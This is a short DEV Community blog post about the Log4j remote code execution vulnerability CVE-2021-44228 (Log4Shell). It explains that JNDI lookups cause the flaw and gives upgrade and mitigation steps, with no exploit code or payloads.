DEV Community ๐Ÿ‘ฉโ€๐Ÿ’ป๐Ÿ‘จโ€๐Ÿ’ป

nabbisen
nabbisen

Posted on • Updated on • Originally published at scqr.net

About Apache Log4j RCE vulnerability (CVE-2021-44228)

Summary

  • Caused by Apache Log4j's JNDI ("Java Naming and Directory Interface") features.
  • How is it severe? The CVSS score is 10, the maximum, which means the highest risk.

Description

CVE-2021-44228 (named "log4shell" or "log4jam"): Remote code execution (RCE) severe vulnerability, discovered in Log4j, affects a wide range.

It's because Log4j is related to JAVA, one of general-purpose programming languages and used widely, and also used by popular frameworks such as Spring, Struts, LogStash and Solr etc. internally.

To be a pity, it's straightforward and easier for attackers to exploit the CVE-2021-44228 (log4shell) vulnerability. As to services open to some network, especially Internet, the situation is really dangerous.

It has been being considered as a historical one, with being referred to Heartbleed and Shell shock (or Bashdoor), discovered in 2014.

Updating Log4j version to 2.15.0 is strongly recommended.

How to fix it

  • Strongly recommended to updated log4j version 2.15.0 (or later).

Second best and temporary ways to mitigate it

Well, When it's difficult to update #Log4j, they are possible:

  • Use WAF.
  • if ver >= 2.10.0: Disable JNDI lookup with system property (log4j2.formatMsgNoLookups) or environment variable (LOG4J_FORMAT_MSG_NO_LOOKUPS).
  • else: Remove JndiLookup from classpath.

This post is based on the tweets by my company.

Top comments (1)

Collapse
 
Sloan, the sloth mascot
Comment deleted

Rust language vs others

Stop by this week's meme thread!